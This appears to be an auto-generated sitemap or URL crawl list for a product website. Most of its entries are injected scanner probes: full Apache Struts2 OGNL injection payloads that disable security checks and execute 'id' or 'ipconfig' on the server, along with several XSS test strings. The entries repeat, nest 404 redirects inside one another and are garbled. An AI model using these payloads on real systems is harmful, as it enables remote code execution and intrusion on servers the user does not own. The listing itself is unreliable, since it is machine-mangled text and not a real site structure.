http://nysadhg.v3.hnrich.net/products/c'_016f8152-c843-41f8-9cb2-efec610ef1ea_002_product.html?debug=command&expression=%23f%3d%23_memberaccess.getclass().getdeclaredfield('allowstaticmethodaccess')%2c%23f.setaccessible(true)%2c%23f.set(%23_memberaccess%2ctrue)%2c%23req%3d%40org.apache.struts2.servletactioncontext%40getrequest()%2c%23resp%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23a%3d(new%20java.lang.processbuilder(new%20java.lang.string%5b%5d%7b'id'%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew%20java.io.inputstreamreader(%23b)%2c%23d%3dnew%20java.io.bufferedreader(%23c)%2c%23e%3dnew%20char%5b10000%5d%2c%23d.read(%23e)%2c%23resp.println(%23e)%2c%23resp.close() 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'_016f8152-c843-41f8-9cb2-efec610ef1ea_002_product.html?(%27%5c43_memberaccess%5b%5c%27allowstaticmethodaccess%5c%27%5d%27)(meh)=true&(aaa)((%27%5c43context%5b%5c%27xwork.methodaccessor.denymethodexecution%5c%27%5d%5c75false%27)(d))&(%27%5c43c%27)((%27%5c43_memberaccess.excludeproperties%5c75%40java.util.collections%40empty_set%27)(c))&(asdf)((%27%5c43rp%5c75%40org.apache.struts2.servletactioncontext%40getresponse()%27)(c))&(fgd)((%27%5c43rp.getwriter().print(%5c%27anon3ymmous%5c%27)%27)(d))&(fgd)((%27%5c43rp.getwriter().print(%5c%27security_struts_test%5c%27)%27)(d))&(grgr)((%27%5c43rp.getwriter().close()%27)(d))=1? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/c'%5b%5d_016f8152-c843-41f8-9cb2-efec610ef1ea_002_product.html?xsstest 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'_016f8152-c843-41f8-9cb2-efec610ef1ea_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%27_016f8152-c843-41f8-9cb2-efec610ef1ea_002_product.html%3fuser.action? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_74065e5f-c87a-4ddf-91d9-8a4c858675e4%3f_002_product.html?debug=command&expression=%23f%3d%23_memberaccess.getclass().getdeclaredfield(%27allowstaticmethodaccess%27)%2c%23f.setaccessible(true)%2c%23f.set(%23_memberaccess%2ctrue)%2c%23req%3d%40org.apache.struts2.servletactioncontext%40getrequest()%2c%23resp%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23a%3d(new+java.lang.processbuilder(new+java.lang.string%5b%5d%7b%27id%27%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew+java.io.inputstreamreader(%23b)%2c%23d%3dnew+java.io.bufferedreader(%23c)%2c%23e%3dnew+char%5b10000%5d%2c%23d.read(%23e)%2c%23resp.println(%23e)%2c%23resp.close()? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'_016f8152-c843-41f8-9cb2-efec610ef1ea_002_product.html?class.classloader.jarpath=(%23context%5b%22xwork.methodaccessor.denymethodexecution%22%5d%3d+new+java.lang.boolean(false)%2c+%23_memberaccess%5b%22allowstaticmethodaccess%22%5d%3dtrue%2c+%23a%3d%40java.lang.runtime%40getruntime().exec(%27id%27).getinputstream()%2c%23b%3dnew+java.io.inputstreamreader(%23a)%2c%23c%3dnew+java.io.bufferedreader(%23b)%2c%23d%3dnew+char%5b50000%5d%2c%23c.read(%23d)%2c%23test%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23test.println(%23d)%2c%23test.close())(meh)&z%5b(class.classloader.jarpath)(%27meh%27)%5d? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'_016f8152-c843-41f8-9cb2-efec610ef1ea_002_product.html?debug=command&expression=%23f%3d%23_memberaccess.getclass().getdeclaredfield(%27allowstaticmethodaccess%27)%2c%23f.setaccessible(true)%2c%23f.set(%23_memberaccess%2ctrue)%2c%23req%3d%40org.apache.struts2.servletactioncontext%40getrequest()%2c%23resp%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23a%3d(new+java.lang.processbuilder(new+java.lang.string%5b%5d%7b%27id%27%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew+java.io.inputstreamreader(%23b)%2c%23d%3dnew+java.io.bufferedreader(%23c)%2c%23e%3dnew+char%5b10000%5d%2c%23d.read(%23e)%2c%23resp.println(%23e)%2c%23resp.close()? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/c%3f_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html?('%5cu0023_memberaccess[%5c'allowstaticmethodaccess%5c']')(meh)=true&(aaa)(('%5cu0023context[%5c'xwork.methodaccessor.denymethodexecution%5c']%5cu003dfalse')(d))&('%5cu0023c')(('%5cu0023_memberaccess.excludeproperties%5cu003d@java.util.collections@empty_set')(c))&(asdf)(('%5cu0023rp%5cu003d@org.apache.struts2.servletactioncontext@getresponse()')(c))&(fgd)(('%5cu0023rp.getwriter().print(%5c'anon3ymmous%5c')')(d))&(fgd)(('%5cu0023rp.getwriter().print(%5c'security_struts_test%5c')')(d))&(grgr)(('%5cu0023rp.getwriter().close()')(d))=1 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%3f_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%3f_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html%3f?&debug=command&expression=%23f%3d%23_memberaccess.getclass().getdeclaredfield('allowstaticmethodaccess')%2c%23f.setaccessible(true)%2c%23f.set(%23_memberaccess%2ctrue)%2c%23req%3d%40org.apache.struts2.servletactioncontext%40getrequest()%2c%23resp%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23a%3d(new%20java.lang.processbuilder(new%20java.lang.string%5b%5d%7b'ipconfig'%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew%20java.io.inputstreamreader(%23b)%2c%23d%3dnew%20java.io.bufferedreader(%23c)%2c%23e%3dnew%20char%5b10000%5d%2c%23d.read(%23e)%2c%23resp.println(%23e)%2c%23resp.close() 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/c%3f_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html?redirect:$%7b%23a%3d(new%20java.lang.processbuilder(new%20java.lang.string[]%7b'ipconfig','-all'%7d)).start(),%23b%3d%23a.getinputstream(),%23c%3dnew%20java.io.inputstreamreader(%23b),%23d%3dnew%20java.io.bufferedreader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23test%3d%23context.get('com.opensymphony.xwork2.dispatcher.httpservletresponse'),%23test.getwriter().println(%23e),%23test.getwriter().flush(),%23test.getwriter().close()%7d 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%3f_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%3f_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html%3f?&('%5cu0023_memberaccess[%5c'allowstaticmethodaccess%5c']')(meh)=true&(aaa)(('%5cu0023context[%5c'xwork.methodaccessor.denymethodexecution%5c']%5cu003dfalse')(d))&('%5cu0023c')(('%5cu0023_memberaccess.excludeproperties%5cu003d@java.util.collections@empty_set')(c))&(asdf)(('%5cu0023rp%5cu003d@org.apache.struts2.servletactioncontext@getresponse()')(c))&(fgd)(('%5cu0023rp.getwriter().print(%5c'anon3ymmous%5c')')(d))&(fgd)(('%5cu0023rp.getwriter().print(%5c'security_struts_test%5c')')(d))&(grgr)(('%5cu0023rp.getwriter().close()')(d))=1 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%3f_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html?redirect%3a%24%7b%23a%3d(new+java.lang.processbuilder(new+java.lang.string%5b%5d%7b%27ipconfig%27%2c%27-all%27%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew+java.io.inputstreamreader(%23b)%2c%23d%3dnew+java.io.bufferedreader(%23c)%2c%23e%3dnew+char%5b50000%5d%2c%23d.read(%23e)%2c%23test%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.httpservletresponse%27)%2c%23test.getwriter().println(%23e)%2c%23test.getwriter().flush()%2c%23test.getwriter().close()%7d? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/c%3f_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html?debug=command&expression=%23f%3d%23_memberaccess.getclass().getdeclaredfield('allowstaticmethodaccess')%2c%23f.setaccessible(true)%2c%23f.set(%23_memberaccess%2ctrue)%2c%23req%3d%40org.apache.struts2.servletactioncontext%40getrequest()%2c%23resp%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23a%3d(new%20java.lang.processbuilder(new%20java.lang.string%5b%5d%7b'ipconfig'%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew%20java.io.inputstreamreader(%23b)%2c%23d%3dnew%20java.io.bufferedreader(%23c)%2c%23e%3dnew%20char%5b10000%5d%2c%23d.read(%23e)%2c%23resp.println(%23e)%2c%23resp.close() 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%3f_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%3f_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html%3f404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%3f_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html%3f%3f&debug=command&expression=%23f%3d%23_memberaccess.getclass().getdeclaredfield(%27allowstaticmethodaccess%27)%2c%23f.setaccessible(true)%2c%23f.set(%23_memberaccess%2ctrue)%2c%23req%3d%40org.apache.struts2.servletactioncontext%40getrequest()%2c%23resp%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23a%3d(new+java.lang.processbuilder(new+java.lang.string%5b%5d%7b%27ipconfig%27%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew+java.io.inputstreamreader(%23b)%2c%23d%3dnew+java.io.bufferedreader(%23c)%2c%23e%3dnew+char%5b10000%5d%2c%23d.read(%23e)%2c%23resp.println(%23e)%2c%23resp.close()? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html?=%3ca54a44%20x%3d956437956%3e 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%3f_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%3f_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html%3f404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%3f_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html%3f%3f&z%5b(class.classloader.jarpath)(%27meh%27)%5d&class.classloader.jarpath=(%23context%5b%22xwork.methodaccessor.denymethodexecution%22%5d%3d+new+java.lang.boolean(false)%2c+%23_memberaccess%5b%22allowstaticmethodaccess%22%5d%3dtrue%2c+%23a%3d%40java.lang.runtime%40getruntime().exec(%27ipconfig%27).getinputstream()%2c%23b%3dnew+java.io.inputstreamreader(%23a)%2c%23c%3dnew+java.io.bufferedreader(%23b)%2c%23d%3dnew+char%5b50000%5d%2c%23c.read(%23d)%2c%23test%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23test.println(%23d)%2c%23test.close())(meh)? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%3f_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%3f_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html%3f?&test=$%7b%5cu0023_memberaccess[%22allowstaticmethodaccess%22]=true,@org.apache.struts2.servletactioncontext@getresponse().getwriter().print('anonymous_'),@org.apache.struts2.servletactioncontext@getresponse().getwriter().print('security_s2013_test'),@org.apache.struts2.servletactioncontext@getresponse().getwriter().close()%7d 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/c'%5b%5d_016f8152-c843-41f8-9cb2-efec610ef1ea_002_product.html?redirect:$%7b%23a%3d(new%20java.lang.processbuilder(new%20java.lang.string[]%7b'id'%7d)).start(),%23b%3d%23a.getinputstream(),%23c%3dnew%20java.io.inputstreamreader(%23b),%23d%3dnew%20java.io.bufferedreader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23test%3d%23context.get('com.opensymphony.xwork2.dispatcher.httpservletresponse'),%23test.getwriter().println(%23e),%23test.getwriter().flush(),%23test.getwriter().close()%7d 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%3f_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html?debug=command&expression=%23f%3d%23_memberaccess.getclass().getdeclaredfield(%27allowstaticmethodaccess%27)%2c%23f.setaccessible(true)%2c%23f.set(%23_memberaccess%2ctrue)%2c%23req%3d%40org.apache.struts2.servletactioncontext%40getrequest()%2c%23resp%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23a%3d(new+java.lang.processbuilder(new+java.lang.string%5b%5d%7b%27ipconfig%27%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew+java.io.inputstreamreader(%23b)%2c%23d%3dnew+java.io.bufferedreader(%23c)%2c%23e%3dnew+char%5b10000%5d%2c%23d.read(%23e)%2c%23resp.println(%23e)%2c%23resp.close()? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%3f_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%3f_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html%3f?=cmvmbgvjdgvkyw5vbnltb3vzc2vjdxjpdhkz 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%27_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html%3f=%3c830584%3c? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'%5b%5d_016f8152-c843-41f8-9cb2-efec610ef1ea_002_product.html?(%27%5c43_memberaccess%5b%5c%27allowstaticmethodaccess%5c%27%5d%27)(meh)=true&(aaa)((%27%5c43context%5b%5c%27xwork.methodaccessor.denymethodexecution%5c%27%5d%5c75false%27)(d))&(%27%5c43c%27)((%27%5c43_memberaccess.excludeproperties%5c75%40java.util.collections%40empty_set%27)(c))&(asdf)((%27%5c43rp%5c75%40org.apache.struts2.servletactioncontext%40getresponse()%27)(c))&(fgd)((%27%5c43rp.getwriter().print(%5c%27anon3ymmous%5c%27)%27)(d))&(fgd)((%27%5c43rp.getwriter().print(%5c%27security_struts_test%5c%27)%27)(d))&(grgr)((%27%5c43rp.getwriter().close()%27)(d))=1? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/c_016f8152-c843-41f8-9cb2-efec610ef1ea%3f_002_product.html?class.classloader.jarpath=%28%23context[%22xwork.methodaccessor.denymethodexecution%22]%3d+new+java.lang.boolean%28false%29%2c+%23_memberaccess[%22allowstaticmethodaccess%22]%3dtrue%2c+%23a%3d%40java.lang.runtime%40getruntime%28%29.exec('ipconfig').getinputstream%28%29%2c%23b%3dnew+java.io.inputstreamreader%28%23a%29%2c%23c%3dnew+java.io.bufferedreader%28%23b%29%2c%23d%3dnew+char[50000]%2c%23c.read%28%23d%29%2c%23test%3d%40org.apache.struts2.servletactioncontext%40getresponse%28%29.getwriter%28%29%2c%23test.println%28%23d%29%2c%23test.close%28%29%29%28meh%29&z[%28class.classloader.jarpath%29%28%27meh%27%29] 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%3f_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%3f_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html%3f404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%3f_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html%3f%3f=cmvmbgvjdgvkyw5vbnltb3vzc2vjdxjpdhkz? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%3f_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%3f_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html%3f404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%3f_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html%3f%3f&redirect%3a%24%7b%23a%3d(new+java.lang.processbuilder(new+java.lang.string%5b%5d%7b%27ipconfig%27%2c%27-all%27%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew+java.io.inputstreamreader(%23b)%2c%23d%3dnew+java.io.bufferedreader(%23c)%2c%23e%3dnew+char%5b50000%5d%2c%23d.read(%23e)%2c%23test%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.httpservletresponse%27)%2c%23test.getwriter().println(%23e)%2c%23test.getwriter().flush()%2c%23test.getwriter().close()%7d? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%3f_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html?redirect%3a%24%7b%23a%3d(new+java.lang.processbuilder(new+java.lang.string%5b%5d%7b%27id%27%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew+java.io.inputstreamreader(%23b)%2c%23d%3dnew+java.io.bufferedreader(%23c)%2c%23e%3dnew+char%5b50000%5d%2c%23d.read(%23e)%2c%23test%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.httpservletresponse%27)%2c%23test.getwriter().println(%23e)%2c%23test.getwriter().flush()%2c%23test.getwriter().close()%7d? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%3f_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%3f_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html%3f404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%3f_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html%3f%3f&test=%24%7b%5cu0023_memberaccess%5b%22allowstaticmethodaccess%22%5d%3dtrue%2c%40org.apache.struts2.servletactioncontext%40getresponse().getwriter().print(%27anonymous_%27)%2c%40org.apache.struts2.servletactioncontext%40getresponse().getwriter().print(%27security_s2013_test%27)%2c%40org.apache.struts2.servletactioncontext%40getresponse().getwriter().close()%7d? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%3f_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%3f_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html%3f?=xsstest622 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%3f_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%3f_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html%3f404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%3f_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html%3f%3f%24%7b100002-1%2b%27anonymous_%27%2b%27security_s2015_test%27%7d.action? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/c%3f_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html?class.classloader.jarpath=%28%23context[%22xwork.methodaccessor.denymethodexecution%22]%3d+new+java.lang.boolean%28false%29%2c+%23_memberaccess[%22allowstaticmethodaccess%22]%3dtrue%2c+%23a%3d%40java.lang.runtime%40getruntime%28%29.exec('ipconfig').getinputstream%28%29%2c%23b%3dnew+java.io.inputstreamreader%28%23a%29%2c%23c%3dnew+java.io.bufferedreader%28%23b%29%2c%23d%3dnew+char[50000]%2c%23c.read%28%23d%29%2c%23test%3d%40org.apache.struts2.servletactioncontext%40getresponse%28%29.getwriter%28%29%2c%23test.println%28%23d%29%2c%23test.close%28%29%29%28meh%29&z[%28class.classloader.jarpath%29%28%27meh%27%29] 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/c_74065e5f-c87a-4ddf-91d9-8a4c858675e4'_002_product.html?debug=command&expression=%23f%3d%23_memberaccess.getclass().getdeclaredfield('allowstaticmethodaccess')%2c%23f.setaccessible(true)%2c%23f.set(%23_memberaccess%2ctrue)%2c%23req%3d%40org.apache.struts2.servletactioncontext%40getrequest()%2c%23resp%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23a%3d(new%20java.lang.processbuilder(new%20java.lang.string%5b%5d%7b'ipconfig'%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew%20java.io.inputstreamreader(%23b)%2c%23d%3dnew%20java.io.bufferedreader(%23c)%2c%23e%3dnew%20char%5b10000%5d%2c%23d.read(%23e)%2c%23resp.println(%23e)%2c%23resp.close() 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%3f_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html?class.classloader.jarpath=(%23context%5b%22xwork.methodaccessor.denymethodexecution%22%5d%3d+new+java.lang.boolean(false)%2c+%23_memberaccess%5b%22allowstaticmethodaccess%22%5d%3dtrue%2c+%23a%3d%40java.lang.runtime%40getruntime().exec(%27ipconfig%27).getinputstream()%2c%23b%3dnew+java.io.inputstreamreader(%23a)%2c%23c%3dnew+java.io.bufferedreader(%23b)%2c%23d%3dnew+char%5b50000%5d%2c%23c.read(%23d)%2c%23test%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23test.println(%23d)%2c%23test.close())(meh)&z%5b(class.classloader.jarpath)(%27meh%27)%5d? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html/xsstest?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%3f_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%3f_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html%3f? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%3f_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html?xsstest? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%3f_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%3f_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html%3f404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%3f_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html%3f%3f=xsstest622? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_74065e5f-c87a-4ddf-91d9-8a4c858675e4'_002_product.html?debug=command&expression=%23f%3d%23_memberaccess.getclass().getdeclaredfield(%27allowstaticmethodaccess%27)%2c%23f.setaccessible(true)%2c%23f.set(%23_memberaccess%2ctrue)%2c%23req%3d%40org.apache.struts2.servletactioncontext%40getrequest()%2c%23resp%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23a%3d(new+java.lang.processbuilder(new+java.lang.string%5b%5d%7b%27ipconfig%27%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew+java.io.inputstreamreader(%23b)%2c%23d%3dnew+java.io.bufferedreader(%23c)%2c%23e%3dnew+char%5b10000%5d%2c%23d.read(%23e)%2c%23resp.println(%23e)%2c%23resp.close()? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%3f_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html?404%3bhttp:%2f%2fnysadhg.v3.hnrich.net:80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%3f_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html%3f?=fsm58349%ef%bc%9cf1%ef%b9%a5f2%ca%baf3%ca%b9fem98623 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/c_016f8152-c843-41f8-9cb2-efec610ef1ea%3f_002_product.html?debug=command&expression=%23f%3d%23_memberaccess.getclass().getdeclaredfield('allowstaticmethodaccess')%2c%23f.setaccessible(true)%2c%23f.set(%23_memberaccess%2ctrue)%2c%23req%3d%40org.apache.struts2.servletactioncontext%40getrequest()%2c%23resp%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23a%3d(new%20java.lang.processbuilder(new%20java.lang.string%5b%5d%7b'ipconfig'%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew%20java.io.inputstreamreader(%23b)%2c%23d%3dnew%20java.io.bufferedreader(%23c)%2c%23e%3dnew%20char%5b10000%5d%2c%23d.read(%23e)%2c%23resp.println(%23e)%2c%23resp.close() 0.5 2024-04-15 